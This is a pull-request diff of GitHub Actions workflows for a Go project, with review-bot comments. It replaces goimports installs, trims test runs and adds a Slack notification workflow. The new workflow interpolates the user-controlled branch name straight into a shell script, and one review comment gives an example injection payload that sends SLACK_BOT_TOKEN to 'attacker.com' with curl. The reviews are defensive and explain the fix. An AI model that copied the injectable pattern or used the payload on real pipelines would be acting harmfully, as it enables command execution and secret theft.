31 changes: 19 additions & 12 deletions .github/workflows/pr.yml
@@ -27,14 +27,10 @@ jobs:
go-version: ${{ env.GO_VERSION }}
cache: true

- name: install deps
run: |
go install golang.org/x/tools/cmd/goimports@${{ env.GOIMPORTS_VERSION }}
go install github.com/klauspost/asmfmt/cmd/asmfmt@${{ env.ASMFMT_VERSION }}
- name: gofmt
run: if [[ -n $(gofmt -l .) ]]; then echo "please run gofmt"; exit 1; fi
- name: goimports
run: if [[ -n $(goimports -l .) ]]; then echo "please run goimports"; exit 1; fi
run: if [[ -n $(go tool goimports -l .) ]]; then echo "please run goimports"; exit 1; fi
- name: generated files should not be modified
run: |
go generate ./...
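Review bot: `go tool goimports` on the goimports line only resolves if `golang.org/x/tools/cmd/goimports` is declared with a `tool` directive in go.mod (available from Go 1.24; the workflows pin `GO_VERSION: 1.25.x`), and no go.mod/go.sum change is in this diff, so confirm it is part of the PR or the step will fail with an unknown-tool error instead of a formatting result. The move itself is a supply-chain improvement: the pin leaves a free-floating `GOIMPORTS_VERSION` env var and lands in go.mod, where go.sum verifies the module hash. The `asmfmt` install is dropped here with no `go tool asmfmt` equivalent; if `go generate ./...` in the step right below shells out to `asmfmt`, the "generated files should not be modified" check will fail on a missing binary rather than on a real diff.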
@@ -67,8 +63,6 @@ jobs:

- name: install deps
run: |
go install golang.org/x/tools/cmd/goimports@${{ env.GOIMPORTS_VERSION }}
go install github.com/klauspost/asmfmt/cmd/asmfmt@${{ env.ASMFMT_VERSION }}
go install github.com/consensys/[email protected]
go install github.com/ethereum/go-ethereum/cmd/[email protected]
sudo add-apt-repository ppa:ethereum/ethereum
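Review bot: with the two `go install` lines removed, nothing in the test job's `install deps` step puts `goimports` or `asmfmt` on PATH any more, so any test or `//go:generate` directive under `./...` that execs them by name will fail with "command not found"; a grep for both names before merge would settle it. The surrounding context also shows the remaining installs pinned to exact versions (`gnark-solidity-checker@v0.1.0`-style pins are verified against the Go checksum database by `go install pkg@version`), which leaves `sudo add-apt-repository ppa:ethereum/ethereum` as the one unpinned, unverified dependency in this step.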
@@ -86,8 +80,21 @@ jobs:
- name: Run tests
run: |
set -euo pipefail
go test -json -v -p 4 -short -timeout=30m ./... 2>&1 | gotestfmt -hide=all | tee /tmp/gotest.log
go test -json -v -p 4 -timeout=30m -tags=release_checks,solccheck . 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log
go test -json -v -p 4 -timeout=30m -tags=prover_checks ./test/... 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log
go test -json -v -p 4 -timeout=30m -tags=prover_checks ./examples/... 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log
go test -json -v -run=NONE -fuzz=FuzzIntcomp -fuzztime=30s ./internal/backend/ioutils 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log
go test -short -json -v -p 4 -short -timeout=30m ./... 2>&1 | gotestfmt -hide=all | tee /tmp/gotest.log
cursor[bot] commented:

Duplicate -short flag in test command

Low Severity

The go test command on this line passes -short twice: once at the beginning and once after -p 4. The original command already had -short before -timeout=30m, and the bulk addition of -short to the start of each test line created this duplication. While Go silently accepts duplicate flags, this is clearly unintentional and suggests a missed cleanup.

go test -short -json -v -p 4 -timeout=30m -tags=release_checks,solccheck . 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log
go test -short -json -v -p 4 -timeout=30m -tags=prover_checks ./test/... 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log
go test -short -json -v -p 4 -timeout=30m -tags=prover_checks ./examples/... 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log
go test -short -json -v -run=NONE -fuzz=FuzzIntcomp -fuzztime=10s ./internal/backend/ioutils 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log

notify:
needs: test
if: always()
uses: ./.github/workflows/slack-notifications.yml
with:
status: ${{ needs.test.result == 'success' && 'success' || 'failure' }}
actor: ${{ github.actor }}
repository: ${{ github.repository }}
branch: ${{ github.head_ref }}
run_id: ${{ github.run_id }}
secrets:
SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }}
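Review bot: the first `go test` line now carries `-short` twice (`go test -short -json -v -p 4 -short ...`); drop one. More substantively, this hunk deletes the four full-depth runs (the `release_checks,solccheck` run and both `prover_checks` runs) in favour of `-short` variants and cuts the fuzz budget from 30s to 10s, so PR CI no longer exercises the non-short paths at all and the first full run happens in the push workflow; if that is the intent, state it in the workflow or PR description so a green PR is not read as full coverage. In the new `notify` job, `branch: ${{ github.head_ref }}` is the PR author's branch name and is forwarded to a reusable workflow that interpolates it into a shell `run:` block, so that input must be treated as untrusted on the receiving side. Also, on `pull_request` runs from forks `secrets.SLACK_BOT_TOKEN` is empty, so with `if: always()` the notify job runs and then fails at the Slack call for every fork PR; gate it on the event or tolerate the empty token.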
23 changes: 14 additions & 9 deletions .github/workflows/push.yml
@@ -13,8 +13,6 @@ permissions:

env:
GO_VERSION: 1.25.x
GOIMPORTS_VERSION: v0.42.0
ASMFMT_VERSION: v1.3.2

jobs:
staticcheck:
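Review bot: `GOIMPORTS_VERSION` and `ASMFMT_VERSION` are removed from push.yml's `env:` here, but the pr.yml diff in this same PR deletes the `go install ...@${{ env.GOIMPORTS_VERSION }}` and `...@${{ env.ASMFMT_VERSION }}` lines that consumed them without any hunk that removes their definitions, so pr.yml is left with two dead env vars; remove them there as well to keep the two workflows in step.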
@@ -30,14 +28,10 @@ jobs:
go-version: ${{ env.GO_VERSION }}
cache: true

- name: install deps
run: |
go install golang.org/x/tools/cmd/goimports@${{ env.GOIMPORTS_VERSION }}
go install github.com/klauspost/asmfmt/cmd/asmfmt@${{ env.ASMFMT_VERSION }}
- name: gofmt
run: if [[ -n $(gofmt -l .) ]]; then echo "please run gofmt"; exit 1; fi
- name: goimports
run: if [[ -n $(goimports -l .) ]]; then echo "please run goimports"; exit 1; fi
run: if [[ -n $(go tool goimports -l .) ]]; then echo "please run goimports"; exit 1; fi
- name: generated files should not be modified
run: |
go generate ./...
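Review bot: this drops the `asmfmt` install without a `go tool asmfmt` replacement while the "generated files should not be modified" step right below still runs `go generate ./...`; if any `//go:generate` directive invokes `asmfmt`, that step now fails with "command not found" instead of reporting drift. Since goimports is now invoked as `go tool goimports`, which implies a go.mod `tool` directive, the consistent fix is to declare `github.com/klauspost/asmfmt/cmd/asmfmt` the same way, or note in the PR why asmfmt is no longer needed.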
@@ -80,8 +74,6 @@ jobs:
cache: true
- name: install deps
run: |
go install golang.org/x/tools/cmd/goimports@${{ env.GOIMPORTS_VERSION }}
go install github.com/klauspost/asmfmt/cmd/asmfmt@${{ env.ASMFMT_VERSION }}
go install github.com/ethereum/go-ethereum/cmd/[email protected]
- name: install solc deps
if: startsWith(matrix.os, 'gha-runner-scale-set-ubuntu') == true
@@ -106,3 +98,16 @@ jobs:
go test -v -p 4 -timeout=50m -tags=release_checks -race ./examples/cubic/...
go test -v -p 4 -timeout=50m -tags=release_checks -short -race ./test/...
go test -v -run=NONE -fuzz=FuzzIntcomp -fuzztime=30s ./internal/backend/ioutils

notify:
needs: test
if: always()
uses: ./.github/workflows/slack-notifications.yml
with:
status: ${{ needs.test.result == 'success' && 'success' || 'failure' }}
actor: ${{ github.actor }}
repository: ${{ github.repository }}
branch: ${{ github.ref_name }}
run_id: ${{ github.run_id }}
secrets:
SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }}
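Review bot: `needs: test` makes `needs.test.result` the only signal behind `status`, yet the `staticcheck` job defined earlier in this file is not in `needs`, so a run where staticcheck fails and test passes posts "All checks have passed". Add `staticcheck` to `needs` and derive `status` from both results, e.g. `needs.test.result == 'success' && needs.staticcheck.result == 'success'`. The `if: always()` plus the success/failure ternary also reports a cancelled run as a failure; `if: ${{ !cancelled() }}` is the usual choice. `branch: ${{ github.ref_name }}` is less exposed than a PR head ref because only users with push access set it, but it is still forwarded into a shell script in the called workflow and should be handled there as data, not script text.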
84 changes: 84 additions & 0 deletions .github/workflows/slack-notifications.yml
@@ -0,0 +1,84 @@
name: Slack Notifications

on:
workflow_call:
secrets:
SLACK_BOT_TOKEN:
required: true
inputs:
status:
description: 'The status of the workflow (success or failure)'
required: true
type: string
actor:
description: 'The GitHub actor'
required: true
type: string
repository:
description: 'The GitHub repository'
required: true
type: string
branch:
description: 'The branch name'
required: true
type: string
run_id:
description: 'The workflow run ID'
required: true
type: string

jobs:
notify_slack:
runs-on: ubuntu-latest
steps:
- name: Post to Slack
run: |
if [ "${{ inputs.status }}" == "success" ]; then
payload=$(jq -n --arg repository "${{ inputs.repository }}" --arg branch "${{ inputs.branch }}" --arg actor "${{ inputs.actor }}" --arg run_id "${{ inputs.run_id }}" '{
cursor[bot] commented:

Script injection via branch name in Slack workflow

Medium Severity

${{ inputs.branch }} is directly interpolated into a shell run: block. In the PR workflow, this value comes from ${{ github.head_ref }}, which is a user-controlled branch name. An attacker can craft a branch name containing shell metacharacters (e.g., "; curl attacker.com?t=$SLACK_BOT_TOKEN; #) to achieve arbitrary command execution and potentially exfiltrate SLACK_BOT_TOKEN. The safe pattern is to assign untrusted inputs to environment variables first, then reference them as "$BRANCH" in the script.

"channel": "team-gnark-build",
"text": "GitHub Action build result: success",
"blocks": [
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": ":large_green_circle: *All checks have passed:* *\($branch)* :white_check_mark:"
},
},
{
"type": "context",
"elements": [
{
"type": "mrkdwn",
"text": "\($repository) -- \($actor) -- <https://github.com/\($repository)/actions/runs/\($run_id)|View details>"
}
]
}
]
}')
else
payload=$(jq -n --arg repository "${{ inputs.repository }}" --arg branch "${{ inputs.branch }}" --arg actor "${{ inputs.actor }}" --arg run_id "${{ inputs.run_id }}" '{
"channel": "team-gnark-build",
"text": "GitHub Action build result: failure",
"blocks": [
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": ":red_circle: *Failed run:* *\($branch)*"
},
},
{
"type": "context",
"elements": [
{
"type": "mrkdwn",
"text": "\($repository) -- \($actor) -- <https://github.com/\($repository)/actions/runs/\($run_id)|View details>"
}
]
}
]
}')
fi
response=$(curl -s -X POST -H 'Content-type: application/json; charset=utf-8' --data "$payload" https://slack.com/api/chat.postMessage -H "Authorization: Bearer ${{ secrets.SLACK_BOT_TOKEN }}" )
shell: bash
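Review bot: every `${{ inputs.* }}` in this `run:` block (`inputs.status` in the `if` test, and `repository`, `branch`, `actor`, `run_id` in both `jq` invocations) is substituted into the script text before bash parses it, so a value containing a quote or `;` alters the command rather than the data; `inputs.branch` is fed from `github.head_ref` by pr.yml, which the PR author chooses. Move the inputs into the step's `env:` (`BRANCH: ${{ inputs.branch }}` and so on) and reference them as `"$BRANCH"` / `--arg branch "$BRANCH"` in the script; do the same for the token, `-H "Authorization: Bearer $SLACK_BOT_TOKEN"` with `SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }}` in `env:`, which also keeps the secret out of the command line. Second, `response` is captured and never inspected and `curl -s` has no `--fail`, so a revoked token or malformed payload still leaves the step green; check the response with `jq -e '.ok'` (or an explicit test) so a silent notification failure becomes a step failure. Minor: the success and failure payloads differ only in the `text` and the header line, so building one payload from a status-selected header string would halve the block and make the `env:` fix a single edit.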